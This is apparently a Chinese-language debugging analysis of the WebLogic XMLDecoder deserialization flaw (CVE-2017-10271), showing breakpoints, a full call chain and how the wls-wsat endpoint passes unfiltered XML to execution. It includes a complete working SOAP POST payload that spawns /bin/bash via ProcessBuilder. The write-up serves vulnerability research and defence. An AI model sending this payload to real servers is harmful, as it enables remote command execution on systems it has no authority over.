在weblogic.wsee.jaxws.WLSServletAdapter的129行打點
1 if (var2.getMethod().equals("GET") || var2.getMethod().equals("HEAD")) {
然后開啟debug模式,進行發包,截獲斷點處的請求包。
burp包內容:
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1 Host: localhost:7001 Content-Type: text/xml Content-Length: 987 <?xml version="1.0"?> <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java version="1.8.0_131" class="java.beans.XMLDecoder"> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>id</string> </void> </array> <void method="start" /> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body /> </soapenv:Envelope>
調用鏈(從下往上)
processRequest:43, WorkContextServerTube (weblogic.wsee.jaxws.workcontext)
__doRun:866, Fiber (com.sun.xml.ws.api.pipe)
_doRun:815, Fiber (com.sun.xml.ws.api.pipe)
doRun:778, Fiber (com.sun.xml.ws.api.pipe)
runSync:680, Fiber (com.sun.xml.ws.api.pipe)
process:403, WSEndpointImpl$2 (com.sun.xml.ws.server)
handle:539, HttpAdapter$HttpToolkit (com.sun.xml.ws.transport.http)
handle:253, HttpAdapter (com.sun.xml.ws.transport.http)
handle:140, ServletAdapter (com.sun.xml.ws.transport.http.servlet)
handle:171, WLSServletAdapter (weblogic.wsee.jaxws)
run:708, HttpServletAdapter$AuthorizedInvoke (weblogic.wsee.jaxws)
doAs:363, AuthenticatedSubject (weblogic.security.acl.internal)
runAs:146, SecurityManager (weblogic.security.service)
authenticatedInvoke:103, ServerSecurityHelper (weblogic.wsee.util)
run:311, HttpServletAdapter$3 (weblogic.wsee.jaxws)
post:336, HttpServletAdapter (weblogic.wsee.jaxws)
doRequest:99, JAXWSServlet (weblogic.wsee.jaxws)
service:99, AbstractAsyncServlet (weblogic.servlet.http)
service:820, HttpServlet (javax.servlet.http)
run:227, StubSecurityHelper$ServletServiceAction (weblogic.servlet.internal)
invokeServlet:125, StubSecurityHelper (weblogic.servlet.internal)
execute:301, ServletStubImpl (weblogic.servlet.internal)
execute:184, ServletStubImpl (weblogic.servlet.internal)
wrapRun:3732, WebAppServletContext$ServletInvocationAction (weblogic.servlet.internal)
run:3696, WebAppServletContext$ServletInvocationAction (weblogic.servlet.internal)
doAs:321, AuthenticatedSubject (weblogic.security.acl.internal)
runAs:120, SecurityManager (weblogic.security.service)
securedExecute:2273, WebAppServletContext (weblogic.servlet.internal)
execute:2179, WebAppServletContext (weblogic.servlet.internal)
run:1490, ServletRequestImpl (weblogic.servlet.internal)
execute:256, ExecuteThread (weblogic.work)
run:221, ExecuteThread (weblogic.work)
斷點weblogic.wsee.jaxws.WLSServletAdapter的129行
然后進行下一步調試
因為我們是post請求,這個條件明顯可以F8跳過。沒必要跟入。
來到super.handle(var1, var2, var3);
步入
匹配text/xml后才return true
然后會在com.sun.xml.ws.api.pipe.Fiber進入一個for循環
for循環之中主要是this.next的值在變動。
一直循環到this.next的值為WorkContextServerTube,才是真正觸發的類。
最后到
readHeaderOld函數 
才是步入正題。
看看var1
是我們的post內容
跟進this.readHeaderOld(var3);
查看var4,var4已經被賦值上post真正執行的代碼部分,也就是java標簽開始到結束。
將java代碼實例化WorkContextXmlInputAdapter類。
var4.toByteArray()這處也可以讓我們知道為啥2725里面可以用字節類型生成poc。
真正的底層觸發點
完全沒有過濾。所以執行了rce。到此,10271簡單的分析就結束了。